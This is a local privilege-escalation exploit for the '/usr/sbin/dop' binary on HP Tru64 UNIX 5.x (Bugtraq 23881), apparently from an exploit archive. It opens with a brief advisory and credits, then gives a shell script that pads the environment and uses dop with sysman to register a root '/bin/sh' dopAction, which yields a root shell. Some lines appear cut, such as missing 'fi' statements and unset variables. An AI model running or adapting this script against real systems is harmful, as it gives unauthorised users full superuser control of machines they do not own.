HP Tru64 for UNIX is prone to a local privilege-escalation vulnerability.
Exploiting this issue allows local attackers to execute arbitrary code with superuser privileges.
Successful exploits will result in a complete compromise of vulnerable computers. Failed exploit attempts will result in a denial of service.
# - Author/Credits:
# Daniele Calore; orkaan <at>
# - Description:
# HP Tru64 DOP Local Privilege Escalation Vulnerability
# UNIX HP Tru64 5.X '/usr/sbin/dop' Local Vulnerability root escalation.
# HP Security bulletin code identification: HPSBTU02211 SSRT071326
# Bugtraq ID: 23881
# - Public Released:
# 2007-05-09
# - System Affected:
# Tru64 5.1 (ALL) (Last PatchKit: T64v51B20AS0006-20030210 - PK6 - BL20)
# Tru64 5.1A (ALL) (Last PatchKit: T64V51AB24AS0006-20031031 - PK6 - BL24)
# Tru64 5.1B (ALL) (Last PatchKit: T64V51BB27AS0006-20061208 - PK6 - BL26)
# - System NOT Tested:
# Tru64 5.0
# - System NOT Affected:
# Tru64 4.0x (dop will allways require root password, also for user root)
# - More info:
# Defines:
# Environment size target.
# Change this value if you have problems.
# Sleep in seconds.
# Change this value (bigger) if you have problems.
# Credits:
echo "UNIX HP Tru64 5.X '/usr/sbin/dop' Local Vulnerability root escalation."
echo "HP Security bulletin code identification: HPSBTU02211 SSRT071326"
echo "Bugtraq ID: 23881"
echo "Author: Daniele Calore; orkaan <at>"
echo ""
# Checks:
# Check User.
MYUID=`id -u`
if [ ${MYUID} -eq 0 ]; then
echo "Why execute this if you are allready root?"
exit 1
# Check dop binary.
test -u "${DOP}"
if [ $? -ne 0 ]; then
echo "${DOP} binary is without set-user ID bit... Sorry!"
exit 1
# Check exec_disable_arg_limit.
ARG_LIMIT=`sysconfig -q proc exec_disable_arg_limit 2>/dev/null | tail -1 |\
cut -f3 -d" "`
if [ "Z${ARG_LIMIT}" != "Z0" ]; then
echo "exec_disable_arg_limit is set to ${ARG_LIMIT:-none}... Sorry!"
exit 1
# DOPAction Attack:
echo "Ready:"
# Unset Display.
echo "1- Unset DISPLAY."
# Make ENV big enough.
echo "2- Make ENV big enough."
ENV_SIZE=`env | wc -c | tr -cd '[[:digit:]]'`
ENV_SIZE=`expr ${ENV_TRG} - ${ENV_SIZE} - 3`
A=`perl -e "print 'A' x ${ENV_SIZE}`; export A
ENV_SIZE=`env | wc -c | tr -cd '[[:digit:]]'`
echo " Actual ENV size is ${ENV_SIZE}; target is ${ENV_TRG};"
# Create dopAction.
echo "3- Create a dopAction 'shell'.
Remember to delete it.
As root do:
/usr/sbin/sysman -cli -delete row -comp doprc -group dopActions -key1
- The script will never end.
- If it does not run change ENV_TRG...
- It is normal to see a message like:
Error occurred trying to update /etc/doprc:
shell already exists in /etc/doprc
(This mean that the BUG is present...)
You have to wait ${SLEEP} seconds.
After this amount of time you will see a: '#' (the root shell prompt).
# Fork it in Background.
dop /usr/sbin/sysman -cli -add row -comp doprc -group dopActions \
-data "shell SuperUsers {{/bin/sh *}}" &
# Run the new dopAction.
# Sleep some seconds (maybe you have to change this value).
sleep ${SLEEP}
echo ""
dop shell
exit 0